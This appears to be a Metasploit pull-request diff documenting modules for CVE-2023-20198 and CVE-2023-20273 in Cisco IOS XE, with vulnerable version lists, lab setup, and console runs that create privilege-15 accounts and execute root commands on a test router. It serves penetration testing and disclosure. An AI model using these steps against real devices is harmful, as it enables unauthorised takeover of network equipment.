### PR TITLE
Exploit & Auxiliary modules for CVE-2023-20198 and CVE-2023-20273 (Cisco IOS XE)

### DIFF
--- a/documentation/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.md
+++ b/documentation/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.md
@@ -1,0 +1,144 @@
+## Vulnerable Application
+This module leverages CVE-2023-20198 against vulnerable instances of Cisco IOS XE devices which have the
+Web UI exposed. An attacker can execute arbitrary CLI commands with privilege level 15.
+
+By default CLI commands are run in the Global configuration mode. To drop down to Privileged EXEC mode,
+you can preface your command with the `exit` keyword followed by an (escaped) newline, e.g. To run the command
+`show version` in Privileged EXEC mode, the CMD must be `exit\\nshow version`. To run a command in Global
+configuration mode, just set the `CMD` option to the command you want to run,
+e.g. `username hax0r privilege 15 password hax0r`.
+
+The vulnerable IOS XE versions are:
+
+16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,
+16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,
+16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,
+16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,
+16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,
+16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,
+16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,
+16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,
+16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,
+16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,
+16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,
+16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,
+16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,
+17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,
+17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,
+17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,
+17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,
+17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,
+17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,
+17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,
+17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,
+17.11.99SW
+
+## Testing
+This module was tested against IOS XE version 16.12.3. To test this module you will need to either:
+
+* Acquire a hardware device running one of the vulnerable firmware versions listed above.
+
+Or
+
+* Setup a virtualized environment.
+  * A [CSR1000V](https://www.cisco.com/c/en/us/products/routers/cloud-services-router-1000v-series/index.html) device
+  can be virtualized using [GNS3](https://www.gns3.com/) and VMWare Workstation/Player. Follow the [Windows setup guide](https://docs.gns3.com/docs/getting-started/installation/windows)
+  to install GNS3 and the [topology guide](https://docs.gns3.com/docs/getting-started/your-first-gns3-topology) to learn
+  how GNS3 can be used.
+  * A suitable firmware image for testing would be `csr1000v-universalk9.16.12.03-serial.qcow2`.
+  * When setting up GNS3, run the `GNS3 2.2.43` Virtual Machine for deploying QEMU based devices.
+  * Create a new CSR1000V instance as a QEMU device.
+  * The CSR1000V device's first ethernet adapter `Gi1` should be connected to a Cloud device, who's adapter was bridged
+  to the physical adapter on the host machine, allowing an IP address to be assigned via DHCP, and allowing the Web UI to
+  be accessible to a remote attacker.
+
+## Verification Steps
+1. Start msfconsole
+2. `use auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set CMD "username hax0r privilege 15 secret hax0r"`
+5. `run`
+6. Visit `https://<TARGET_IP_ADDRESS>/webui/` in a browser and log in with username `hax0r` and password `hax0r`.
+
+## Scenarios
+
+```
+msf6 > use auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198
+msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set RHOST 192.168.86.57
+RHOST => 192.168.86.57
+msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set CMD "exit\\nshow version"
+CMD => exit\nshow version
+msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > show options
+
+Module options (auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198):
+
+   Name     Current Setting     Required  Description
+   ----     ---------------     --------  -----------
+   CMD      exit\nshow version  yes       The Global configuration CLI command to execute. To drop to Privileged EXEC mode, preface your CMD with exit\\n, e.g "exit\\nshow version"
+   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.86.57       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    443                 yes       The target port (TCP)
+   SSL      true                no        Negotiate SSL/TLS for outgoing connections
+   VHOST                        no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run
+[*] Running module against 192.168.86.57
+
+[*] 
+**CLI Line # 2: Cisco IOS XE Software, Version 16.12.03
+**CLI Line # 2: Cisco IOS Software [Gibraltar], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 16.12.3, RELEASE SOFTWARE (fc5)
+**CLI Line # 2: Technical Support: http://www.cisco.com/techsupport
+**CLI Line # 2: Copyright (c) 1986-2020 by Cisco Systems, Inc.
+**CLI Line # 2: Compiled Mon 09-Mar-20 21:50 by mcpre
+**CLI Line # 2: Cisco IOS-XE software, Copyright (c) 2005-2020 by cisco Systems, Inc.
+**CLI Line # 2: All rights reserved.  Certain components of Cisco IOS-XE software are
+**CLI Line # 2: licensed under the GNU General Public License ("GPL") Version 2.0.  The
+**CLI Line # 2: software code licensed under GPL Version 2.0 is free software that comes
+**CLI Line # 2: with ABSOLUTELY NO WARRANTY.  You can redistribute and/or modify such
+**CLI Line # 2: GPL code under the terms of GPL Version 2.0.  For more details, see the
+**CLI Line # 2: documentation or "License Notice" file accompanying the IOS-XE software,
+**CLI Line # 2: or the applicable URL provided on the flyer accompanying the IOS-XE
+**CLI Line # 2: software.
+**CLI Line # 2: ROM: IOS-XE ROMMON
+**CLI Line # 2: router uptime is 3 hours, 59 minutes
+**CLI Line # 2: Uptime for this control processor is 4 hours, 2 minutes
+**CLI Line # 2: System returned to ROM by reload
+**CLI Line # 2: System image file is "bootflash:packages.conf"
+**CLI Line # 2: Last reload reason: reload
+**CLI Line # 2: This product contains cryptographic features and is subject to United
+**CLI Line # 2: States and local country laws governing import, export, transfer and
+**CLI Line # 2: use. Delivery of Cisco cryptographic products does not imply
+**CLI Line # 2: third-party authority to import, export, distribute or use encryption.
+**CLI Line # 2: Importers, exporters, distributors and users are responsible for
+**CLI Line # 2: compliance with U.S. and local country laws. By using this product you
+**CLI Line # 2: agree to comply with applicable laws and regulations. If you are unable
+**CLI Line # 2: to comply with U.S. and local laws, return this product immediately.
+**CLI Line # 2: A summary of U.S. laws governing Cisco cryptographic products may be found at:
+**CLI Line # 2: http://www.cisco.com/wwl/export/crypto/tool/stqrg.html
+**CLI Line # 2: If you require further assistance please contact us by sending email to
+**CLI Line # 2: export@cisco.com.
+**CLI Line # 2: License Level: ax
+**CLI Line # 2: License Type: N/A(Smart License Enabled)
+**CLI Line # 2: Next reload license Level: ax
+**CLI Line # 2: Smart Licensing Status: UNREGISTERED/No Licenses in Use
+**CLI Line # 2: cisco CSR1000V (VXE) processor (revision VXE) with 1113574K/3075K bytes of memory.
+**CLI Line # 2: Processor board ID 9OVFUOGPESO
+**CLI Line # 2: 4 Gigabit Ethernet interfaces
+**CLI Line # 2: 32768K bytes of non-volatile configuration memory.
+**CLI Line # 2: 3012164K bytes of physical memory.
+**CLI Line # 2: 6188032K bytes of virtual hard disk at bootflash:.
+**CLI Line # 2: 0K bytes of WebUI ODM Files at webui:.
+**CLI Line # 2: Configuration register is 0x2102
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run CMD="exit\\nshow clock"
+[*] Running module against 192.168.86.57
+
+[*] 
+**CLI Line # 2: *15:24:05.110 UTC Fri Nov 3 2023
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > 
+```

--- a/documentation/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.md
+++ b/documentation/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.md
@@ -2,12 +2,11 @@
 This module leverages CVE-2023-20198 against vulnerable instances of Cisco IOS XE devices which have the
 Web UI exposed. An attacker can execute arbitrary CLI commands with privilege level 15.
 
-By default [CLI commands](https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/02_cisco_ios_hierarchy.htm)
-are run in the Global configuration mode. To drop down to Privileged EXEC mode, you can preface your command
-with the `exit` keyword followed by an (escaped) newline, e.g. To run the command `show version` in Privileged
-EXEC mode, the CMD must be `exit\\nshow version`. To drop to User EXEC mode you can preface your command with
-two `exit` keywords, e.g. `exit\\nexit\\nshow ip interface brief`. To run a command in Global configuration
-mode, just set the `CMD` option to the command you want to run, e.g. `username hax0r privilege 15 password hax0r`.
+You must specify the IOS command mode to execute a CLI command in. Valid modes are `user`, `privileged`, and
+`global`. To run a command in "Privileged" mode, set the `CMD` option to the command you want to run,
+e.g. `show version` and set the `MODE` to `privileged`.  To run a command in "Global Configuration" mode, set
+the `CMD` option to the command you want to run,  e.g. `username hax0r privilege 15 password hax0r` and set
+the `MODE` to `global`.
 
 The vulnerable IOS XE versions are:
 
@@ -58,8 +57,20 @@ Or
 2. `use auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198`
 3. `set RHOST <TARGET_IP_ADDRESS>`
 4. `set CMD "username hax0r privilege 15 secret hax0r"`
-5. `run`
-6. Visit `https://<TARGET_IP_ADDRESS>/webui/` in a browser and log in with username `hax0r` and password `hax0r`.
+5. `set MODE global`
+6. `run`
+7. Visit `https://<TARGET_IP_ADDRESS>/webui/` in a browser and log in with username `hax0r` and password `hax0r`.
+
+## Options
+
+### CMD
+
+The Cisco CLI command to execute.
+
+### MODE
+Cisco IOS commands cna be executed in one of several modes, specifically "User EXEC" mode, "Privileged EXEC" mode, and 
+"Global Configuration" mode. The `MODE` options lets you explicitly set what mode you want the `CMD` to execute in. Valid
+modes are `user`, `privileged`, and `global`.
 
 ## Scenarios
 
@@ -67,20 +78,23 @@ Or
 msf6 > use auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198
 msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set RHOST 192.168.86.57
 RHOST => 192.168.86.57
-msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set CMD "exit\\nshow version"
-CMD => exit\nshow version
+msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set CMD "show version"
+CMD => show version
+msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set MODE privileged
+MODE => privileged
 msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > show options
 
 Module options (auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198):
 
-   Name     Current Setting     Required  Description
-   ----     ---------------     --------  -----------
-   CMD      exit\nshow version  yes       The Global configuration CLI command to execute. To drop to Privileged EXEC mode, preface your CMD with exit\\n, e.g "exit\\nshow version"
-   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS   192.168.86.57       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT    443                 yes       The target port (TCP)
-   SSL      true                no        Negotiate SSL/TLS for outgoing connections
-   VHOST                        no        HTTP server virtual host
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   CMD      show version     yes       The CLI command to execute.
+   MODE     privileged       yes       The mode to execute the CLI command in, valid values are 'user', 'privileged', or 'global'.
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.86.57    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    443              yes       The target port (TCP)
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
 
 
 View the full module info with the info, or info -d command.
@@ -135,7 +149,7 @@ Processor board ID 9OVFUOGPESO
 Configuration register is 0x2102
 
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run CMD="exit\\nshow clock"
+msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run CMD="show clock"
 [*] Running module against 192.168.86.57
 
 

--- a/documentation/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.md
+++ b/documentation/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.md
@@ -42,15 +42,28 @@ Or
 
 * Setup a virtualized environment.
   * A [CSR1000V](https://www.cisco.com/c/en/us/products/routers/cloud-services-router-1000v-series/index.html) device
-  can be virtualized using [GNS3](https://www.gns3.com/) and VMWare Workstation/Player. Follow the [Windows setup guide](https://docs.gns3.com/docs/getting-started/installation/windows)
-  to install GNS3 and the [topology guide](https://docs.gns3.com/docs/getting-started/your-first-gns3-topology) to learn
-  how GNS3 can be used.
+    can be virtualized using [GNS3](https://www.gns3.com/) and VMWare Workstation/Player. Follow the
+    [Windows setup guide](https://docs.gns3.com/docs/getting-started/installation/windows) to install GNS3 and the
+    [topology guide](https://docs.gns3.com/docs/getting-started/your-first-gns3-topology) to learn how GNS3 can be used.
   * A suitable firmware image for testing would be `csr1000v-universalk9.16.12.03-serial.qcow2`.
   * When setting up GNS3, run the `GNS3 2.2.43` Virtual Machine for deploying QEMU based devices.
-  * Create a new CSR1000V instance as a QEMU device.
-  * The CSR1000V device's first ethernet adapter `Gi1` should be connected to a Cloud device, whose adapter was bridged
-  to the physical adapter on the host machine, allowing an IP address to be assigned via DHCP, and allowing the Web UI to
-  be accessible to a remote attacker.
+  * Create a new CSR1000v instance as a QEMU device.
+  * The CSR1000v device's first ethernet adapter `Gi1` should be connected to a Cloud device, whose adapter was bridged
+    to the physical adapter on the host machine, allowing an IP address to be assigned via DHCP, and allowing the Web UI to
+    be accessible to a remote attacker.
+  * When the virtual router has booted up, you must enable the vulnerable WebUI component. From a serial console on
+    the device:
+    ```
+    Router>enable
+    Router#config
+    Router(config)#ip http server
+    router(config)#ip http secure-server
+    router(config)#ip http authentication local
+    router(config)#username admin privilege 15 secret qwerty
+    router(config)#exit
+    Router#copy running-config startup-config
+    ```
+  * You should now be able to access the WebUI via https://TARGET_IP_ADDRESS/webui and login with admin:qwerty
 
 ## Verification Steps
 1. Start msfconsole

--- a/documentation/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.md
+++ b/documentation/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.md
@@ -2,11 +2,12 @@
 This module leverages CVE-2023-20198 against vulnerable instances of Cisco IOS XE devices which have the
 Web UI exposed. An attacker can execute arbitrary CLI commands with privilege level 15.
 
-By default CLI commands are run in the Global configuration mode. To drop down to Privileged EXEC mode,
-you can preface your command with the `exit` keyword followed by an (escaped) newline, e.g. To run the command
-`show version` in Privileged EXEC mode, the CMD must be `exit\\nshow version`. To run a command in Global
-configuration mode, just set the `CMD` option to the command you want to run,
-e.g. `username hax0r privilege 15 password hax0r`.
+By default [CLI commands](https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/02_cisco_ios_hierarchy.htm)
+are run in the Global configuration mode. To drop down to Privileged EXEC mode, you can preface your command
+with the `exit` keyword followed by an (escaped) newline, e.g. To run the command `show version` in Privileged
+EXEC mode, the CMD must be `exit\\nshow version`. To drop to User EXEC mode you can preface your command with
+two `exit` keywords, e.g. `exit\\nexit\\nshow ip interface brief`. To run a command in Global configuration
+mode, just set the `CMD` option to the command you want to run, e.g. `username hax0r privilege 15 password hax0r`.
 
 The vulnerable IOS XE versions are:
 

--- a/documentation/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.md
+++ b/documentation/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.md
@@ -88,58 +88,58 @@ View the full module info with the info, or info -d command.
 msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run
 [*] Running module against 192.168.86.57
 
-[*] 
-**CLI Line # 2: Cisco IOS XE Software, Version 16.12.03
-**CLI Line # 2: Cisco IOS Software [Gibraltar], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 16.12.3, RELEASE SOFTWARE (fc5)
-**CLI Line # 2: Technical Support: http://www.cisco.com/techsupport
-**CLI Line # 2: Copyright (c) 1986-2020 by Cisco Systems, Inc.
-**CLI Line # 2: Compiled Mon 09-Mar-20 21:50 by mcpre
-**CLI Line # 2: Cisco IOS-XE software, Copyright (c) 2005-2020 by cisco Systems, Inc.
-**CLI Line # 2: All rights reserved.  Certain components of Cisco IOS-XE software are
-**CLI Line # 2: licensed under the GNU General Public License ("GPL") Version 2.0.  The
-**CLI Line # 2: software code licensed under GPL Version 2.0 is free software that comes
-**CLI Line # 2: with ABSOLUTELY NO WARRANTY.  You can redistribute and/or modify such
-**CLI Line # 2: GPL code under the terms of GPL Version 2.0.  For more details, see the
-**CLI Line # 2: documentation or "License Notice" file accompanying the IOS-XE software,
-**CLI Line # 2: or the applicable URL provided on the flyer accompanying the IOS-XE
-**CLI Line # 2: software.
-**CLI Line # 2: ROM: IOS-XE ROMMON
-**CLI Line # 2: router uptime is 3 hours, 59 minutes
-**CLI Line # 2: Uptime for this control processor is 4 hours, 2 minutes
-**CLI Line # 2: System returned to ROM by reload
-**CLI Line # 2: System image file is "bootflash:packages.conf"
-**CLI Line # 2: Last reload reason: reload
-**CLI Line # 2: This product contains cryptographic features and is subject to United
-**CLI Line # 2: States and local country laws governing import, export, transfer and
-**CLI Line # 2: use. Delivery of Cisco cryptographic products does not imply
-**CLI Line # 2: third-party authority to import, export, distribute or use encryption.
-**CLI Line # 2: Importers, exporters, distributors and users are responsible for
-**CLI Line # 2: compliance with U.S. and local country laws. By using this product you
-**CLI Line # 2: agree to comply with applicable laws and regulations. If you are unable
-**CLI Line # 2: to comply with U.S. and local laws, return this product immediately.
-**CLI Line # 2: A summary of U.S. laws governing Cisco cryptographic products may be found at:
-**CLI Line # 2: http://www.cisco.com/wwl/export/crypto/tool/stqrg.html
-**CLI Line # 2: If you require further assistance please contact us by sending email to
-**CLI Line # 2: export@cisco.com.
-**CLI Line # 2: License Level: ax
-**CLI Line # 2: License Type: N/A(Smart License Enabled)
-**CLI Line # 2: Next reload license Level: ax
-**CLI Line # 2: Smart Licensing Status: UNREGISTERED/No Licenses in Use
-**CLI Line # 2: cisco CSR1000V (VXE) processor (revision VXE) with 1113574K/3075K bytes of memory.
-**CLI Line # 2: Processor board ID 9OVFUOGPESO
-**CLI Line # 2: 4 Gigabit Ethernet interfaces
-**CLI Line # 2: 32768K bytes of non-volatile configuration memory.
-**CLI Line # 2: 3012164K bytes of physical memory.
-**CLI Line # 2: 6188032K bytes of virtual hard disk at bootflash:.
-**CLI Line # 2: 0K bytes of WebUI ODM Files at webui:.
-**CLI Line # 2: Configuration register is 0x2102
+
+Cisco IOS XE Software, Version 16.12.03
+Cisco IOS Software [Gibraltar], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 16.12.3, RELEASE SOFTWARE (fc5)
+Technical Support: http://www.cisco.com/techsupport
+Copyright (c) 1986-2020 by Cisco Systems, Inc.
+Compiled Mon 09-Mar-20 21:50 by mcpre
+Cisco IOS-XE software, Copyright (c) 2005-2020 by cisco Systems, Inc.
+All rights reserved.  Certain components of Cisco IOS-XE software are
+licensed under the GNU General Public License ("GPL") Version 2.0.  The
+software code licensed under GPL Version 2.0 is free software that comes
+with ABSOLUTELY NO WARRANTY.  You can redistribute and/or modify such
+GPL code under the terms of GPL Version 2.0.  For more details, see the
+documentation or "License Notice" file accompanying the IOS-XE software,
+or the applicable URL provided on the flyer accompanying the IOS-XE
+software.
+ROM: IOS-XE ROMMON
+router uptime is 3 hours, 59 minutes
+Uptime for this control processor is 4 hours, 2 minutes
+System returned to ROM by reload
+System image file is "bootflash:packages.conf"
+Last reload reason: reload
+This product contains cryptographic features and is subject to United
+States and local country laws governing import, export, transfer and
+use. Delivery of Cisco cryptographic products does not imply
+third-party authority to import, export, distribute or use encryption.
+Importers, exporters, distributors and users are responsible for
+compliance with U.S. and local country laws. By using this product you
+agree to comply with applicable laws and regulations. If you are unable
+to comply with U.S. and local laws, return this product immediately.
+A summary of U.S. laws governing Cisco cryptographic products may be found at:
+http://www.cisco.com/wwl/export/crypto/tool/stqrg.html
+If you require further assistance please contact us by sending email to
+export@cisco.com.
+License Level: ax
+License Type: N/A(Smart License Enabled)
+Next reload license Level: ax
+Smart Licensing Status: UNREGISTERED/No Licenses in Use
+cisco CSR1000V (VXE) processor (revision VXE) with 1113574K/3075K bytes of memory.
+Processor board ID 9OVFUOGPESO
+4 Gigabit Ethernet interfaces
+32768K bytes of non-volatile configuration memory.
+3012164K bytes of physical memory.
+6188032K bytes of virtual hard disk at bootflash:.
+0K bytes of WebUI ODM Files at webui:.
+Configuration register is 0x2102
 
 [*] Auxiliary module execution completed
 msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run CMD="exit\\nshow clock"
 [*] Running module against 192.168.86.57
 
-[*] 
-**CLI Line # 2: *15:24:05.110 UTC Fri Nov 3 2023
+
+*15:24:05.110 UTC Fri Nov 3 2023
 [*] Auxiliary module execution completed
 msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > 
 ```

--- a/documentation/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.md
+++ b/documentation/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.md
@@ -49,7 +49,7 @@ Or
   * A suitable firmware image for testing would be `csr1000v-universalk9.16.12.03-serial.qcow2`.
   * When setting up GNS3, run the `GNS3 2.2.43` Virtual Machine for deploying QEMU based devices.
   * Create a new CSR1000V instance as a QEMU device.
-  * The CSR1000V device's first ethernet adapter `Gi1` should be connected to a Cloud device, who's adapter was bridged
+  * The CSR1000V device's first ethernet adapter `Gi1` should be connected to a Cloud device, whose adapter was bridged
   to the physical adapter on the host machine, allowing an IP address to be assigned via DHCP, and allowing the Web UI to
   be accessible to a remote attacker.
 

--- a/documentation/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.md
+++ b/documentation/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.md
@@ -46,7 +46,7 @@ Or
     * A suitable firmware image for testing would be `csr1000v-universalk9.16.12.03-serial.qcow2`.
     * When setting up GNS3, run the `GNS3 2.2.43` Virtual Machine for deploying QEMU based devices.
     * Create a new CSR1000V instance as a QEMU device.
-    * The CSR1000V device's first ethernet adapter `Gi1` should be connected to a Cloud device, who's adapter is bridged
+    * The CSR1000V device's first ethernet adapter `Gi1` should be connected to a Cloud device, whose adapter is bridged
       to the physical adapter on the host machine, allowing an IP address to be assigned via DHCP, and allowing the Web UI to
       be accessible to a remote attacker.
 

--- a/documentation/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.md
+++ b/documentation/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.md
@@ -89,21 +89,22 @@ can be locked preventing deleting upon the first attempt, so the module will try
 ## Scenarios
 
 ```
-msf6 > use auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273
-msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set RHOST 192.168.86.57
-RHOST => 192.168.86.57
-msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set CMD "id"
-CMD => id
 msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > show options
 
 Module options (auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273):
 
    Name                   Current Setting  Required  Description
    ----                   ---------------  --------  -----------
+   CISCO_ADMIN_PASSWORD                    no        The password of an admin account. If not set, CVE-2023-20198 is leveraged to c
+                                                     reate a new admin password.
+   CISCO_ADMIN_USERNAME                    no        The username of an admin account. If not set, CVE-2023-20198 is leveraged to c
+                                                     reate a new admin account.
    CMD                    id               yes       The OS command to execute.
    Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
-   REMOVE_OUTPUT_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to removing the commands output file.
-   RHOSTS                 192.168.86.57    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   REMOVE_OUTPUT_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to removing the commands
+                                                     output file.
+   RHOSTS                                  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
+                                                     cs/using-metasploit.html
    RPORT                  443              yes       The target port (TCP)
    SSL                    true             no        Negotiate SSL/TLS for outgoing connections
    VHOST                                   no        HTTP server virtual host
@@ -111,28 +112,19 @@ Module options (auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273):
 
 View the full module info with the info, or info -d command.
 
+msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set rhosts 10.5.135.193
+rhosts => 10.5.135.193
+msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set verbose true
+verbose => true
 msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > run
-[*] Running module against 192.168.86.57
+[*] Running module against 10.5.135.193
 
-[*] uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
+[*] Created privilege 15 user 'rfojGrqA' with password 'ixnXyFlw'
+uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
 
+[*] Removing output file '/var/www/fNrmuBOf'
+[*] Removing user 'rfojGrqA'
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > run CMD="uname -a"
-[*] Running module against 192.168.86.57
 
-[*] Linux router 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux
-
-[*] Auxiliary module execution completed
-msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) >  run CMD="cat /etc/release"
-[*] Running module against 192.168.86.57
-
-[*] # Needed for open-vm-tools
-# Copyright (c) 2016 by Cisco Systems, Inc., All rights reserved.
-DISTRIB_ID=Cisco
-DISTRIB_RELEASE=3.10.84
-DISTRIB_CODENAME=IOS-XE
-DISTRIB_DESCRIPTION="Monte Vista Linux"
-
-[*] Auxiliary module execution completed
 msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > 
 ```

--- a/documentation/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.md
+++ b/documentation/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.md
@@ -57,6 +57,22 @@ Or
 4. `set CMD "id"`
 5. `run`
 
+## Options
+
+### CMD
+A Linux OS command to execute on the target device, e.g. `id`
+
+### CISCO_ADMIN_USERNAME
+The username of an admin account. If not set, CVE-2023-20198 is leveraged to first create a new admin account and then
+the new account is then removed after the module completes.
+
+### CISCO_ADMIN_PASSWORD
+The password of an admin account. If not set, CVE-2023-20198 is leveraged to create a new admin password.
+
+### REMOVE_OUTPUT_TIMEOUT
+The maximum timeout (in seconds) to wait when trying to removing the commands output file. The output file
+can be locked preventing deleting upon the first attempt, so the module will try again if needed.
+
 ## Scenarios
 
 ```

--- a/documentation/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.md
